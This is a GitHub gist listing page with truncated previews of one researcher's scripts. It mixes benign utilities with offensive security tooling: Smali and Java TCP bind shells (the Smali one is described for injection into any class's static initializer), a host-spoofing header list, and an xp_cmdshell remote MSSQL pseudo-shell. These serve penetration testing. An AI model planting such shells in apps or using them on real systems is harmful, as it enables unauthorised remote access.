@SeanPesce
SeanPesce / BindShellTcp.smali
Last active March 22, 2024 12:54
TCP bind shell (port 7777) written in Smali. Add this to the static initializer code (clinit) of any loaded class to start the listener.
.method static constructor <clinit>()V
.locals 5
invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
move-result-object v0
const/4 v1, 3
new-array v2, v1, [Ljava/lang/String;
@SeanPesce
SeanPesce / BindShellTcp.java
Last active February 28, 2024 22:48
Java TCP bind shell (also compatible with Android)
// Author: Sean Pesce
//
// This bind shell implementation is compatible with both standard Java and the Android SDK.
// By default, it listens in a new thread, on TCP port 45100, and on all network interfaces.
//
// Start the listener with default parameters like so:
// new BindShellTcp().start();
package com.seanpesce.shell;
@SeanPesce
SeanPesce / host_spoof_headers.txt
Last active November 5, 2023 19:35 — forked from kaimi-/gist:6b3c99538dce9e3d29ad647b325007c1
List of potential host-spoofing HTTP headers
CACHE_INFO
CF_CONNECTING_IP
CF-Connecting-IP
CLIENT_IP
Client-IP
COMING_FROM
CONNECT_VIA_IP
FORWARD_FOR
FORWARD-FOR
FORWARDED_FOR_IP
@SeanPesce
SeanPesce / ghidra_concat.h
Last active June 23, 2024 12:45
Ghidra CONCAT Implementations
// Author: Sean Pesce
//
// Manual implementations of the CONCAT operations produced by the Ghidra decompiler.
// These definitions are helpful for compiling re-implementations of native code using
// decompiler output (e.g., with gcc).
//
// Note that these implementations would be outperformed by minimal C preprocessor macros
// that replicate the same logic.
@SeanPesce
SeanPesce / json_utf8_to_ascii.py
Last active September 30, 2022 12:16
Python 3 script to ASCII-encode a JSON file with UTF-8 data
#!/usr/bin/env python3
# Author: Sean Pesce
import json
import sys
def json_convert_utf8_to_ascii_file(in_fpath, out_fpath, include_encoding=False):
    b = b''
    with open(in_fpath, 'rb') as f:
        b = f.read()
@SeanPesce
SeanPesce / usb_util.py
Last active June 17, 2022 16:28
Python 3 classes for USB bulk device I/O
#!/usr/bin/env python3
# Author: Sean Pesce
# Installing prerequisites:
# sudo pip3 install pyusb
#
# On Windows, you also need to install libusb:
# https://sourceforge.net/projects/libusb-win32/files/libusb-win32-releases/
# Then, use inf-wizard.exe to create and install a libusb driver for the device.
# Note: this requires installation of an unsigned driver.
@SeanPesce
SeanPesce / xp_cmdshell.py
Created June 10, 2022 00:04
Interactive pseudo-shell for executing shell commands on a remote MSSQL server via xp_cmdshell
#!/usr/bin/env python3
# Author: Sean Pesce
# This script acts as a pseudo-shell by executing shell commands on a remote MSSQL server instance
# using sqsh and xp_cmdshell.
import argparse
import os
@SeanPesce
SeanPesce / find_symbol.sh
Last active May 10, 2023 19:03
Linux shell command to find binaries that contain a specific symbol. Useful when searching for command injection and other vulnerabilities.
#!/bin/bash
SYMBOL_NAME="system"; find ./ -type f -exec printf "{}: " \; -exec sh -c "objdump -T \"{}\" 2>&1 | grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; | grep -e " $SYMBOL_NAME"
@SeanPesce
SeanPesce / enum_ex.py
Last active March 18, 2022 16:02
Python 3 convenience class for checking if a value is a valid Enum value
#!/usr/bin/env python3
from enum import EnumMeta, Enum
class EnumExMeta(EnumMeta):
    def __contains__(self, val):
        try:
            self(val)
        except ValueError:
@SeanPesce
SeanPesce / archive.py
Last active March 18, 2022 16:09
Deus Ex: Mankind Divided (DXMD) .archive file extractor
#!/usr/bin/env python3
# Author: Sean Pesce
"""
The classes in this file can be used to extract files from the *.archive files used by DXMD.
Extraction of files that span multiple archives is also supported.
"""
import logging
import os